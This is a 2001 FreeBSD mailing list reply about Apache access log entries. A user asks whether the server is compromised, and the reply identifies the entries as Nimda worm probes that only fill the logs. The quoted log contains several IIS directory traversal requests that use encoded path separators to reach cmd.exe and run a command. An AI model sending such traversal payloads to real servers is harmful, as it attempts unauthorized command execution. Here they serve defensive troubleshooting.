From owner-freebsd-questions Mon Nov 19 13: 4: 7 2001 Delivered-To: freebsd-questions@freebsd.org Received: from akira.lanfear.com (akira.lanfear.com [216.168.61.84]) by hub.freebsd.org (Postfix) with SMTP id 49A1837B418 for ; Mon, 19 Nov 2001 13:04:01 -0800 (PST) Received: (qmail 75786 invoked from network); 19 Nov 2001 21:03:55 -0000 Received: from c1854262-a.sttln1.wa.home.com (HELO sakura) (24.255.90.101) by akira.lanfear.com with SMTP; 19 Nov 2001 21:03:55 -0000 From: mw@lanfear.com To: ann kok , freebsd-questions@FreeBSD.ORG Subject: Re:apache's log MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Mailer: Kiltdown 0.7 Message-Id: <20011119210401.49A1837B418@hub.freebsd.org> Date: Mon, 19 Nov 2001 13:04:01 -0800 (PST) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG this question is being asked about twice a day these days.... It's the Nimda Virus. The only bad thing is that it's filling up your (and my) log files. marc. > ----------------------------- > From: ann kok > To: freebsd-questions@FreeBSD.ORG > Subject: apache's log > Sent: 11/19/2001 12:58> > > > Hi all > > I would like to know whether my web server is > comprising by the following log message > > How do I know it? > > Thank you very much > > 203.64.184.144 - - [20/Nov/2001:00:17:18 +0800] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:19 +0800] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:22 +0800] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > " 404 304 > 203.64.184.144 - - [20/Nov/2001:00:17:26 +0800] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/1. > 0" 400 288 > 203.64.184.144 - - [20/Nov/2001:00:17:33 +0800] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" > 400 288 > 203.64.184.144 - - [20/Nov/2001:00:17:34 +0800] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/ > 1.0" 404 305 > 203.64.184.144 - - [20/Nov/2001:00:17:40 +0800] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" > 404 305 > industry.ssu.ac.kr - - [20/Nov/2001:01:21:34 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:22:58 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:24:29 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:25:59 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:27:30 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:29:00 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:30:30 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:32:01 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:33:31 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:35:02 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:36:32 +0800] > "-" 408 - > industry.ssu.ac.kr - - [20/Nov/2001:01:38:03 +0800] > "-" 408 - > > __________________________________________________ > Do You Yahoo!? > Find the one for you at Yahoo! Personals > http://personals.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message